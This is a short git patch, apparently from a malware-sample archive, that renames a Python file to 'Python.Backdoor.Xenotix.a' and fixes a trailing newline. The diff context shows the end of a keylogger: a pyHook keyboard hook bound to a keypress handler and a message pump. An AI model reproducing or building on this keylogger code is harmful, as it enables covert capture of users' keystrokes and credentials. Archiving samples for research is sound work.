From 29394de70297e6ec6e0024584fb3ba78f25532eb Mon Sep 17 00:00:00 2001
From: vxunderground <57078196+vxunderground@users.noreply.github.com>
Date: Sat, 24 Oct 2020 16:11:29 -0500
Subject: [PATCH] Rename xenotix.py to Python.Backdoor.Xenotix.a

---
 Python/{xenotix.py => Python.Backdoor.Xenotix.a} | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 rename Python/{xenotix.py => Python.Backdoor.Xenotix.a} (96%)

diff --git a/Python/xenotix.py b/Python/Python.Backdoor.Xenotix.a
similarity index 96%
rename from Python/xenotix.py
rename to Python/Python.Backdoor.Xenotix.a
index 933603a..a611756 100644
--- a/Python/xenotix.py
+++ b/Python/Python.Backdoor.Xenotix.a
@@ -207,4 +207,4 @@ def keypressed(event):
 obj = pyHook.HookManager()
 obj.KeyDown = keypressed
 obj.HookKeyboard()
-pythoncom.PumpMessages()
\ No newline at end of file
+pythoncom.PumpMessages()
-- 
GitLab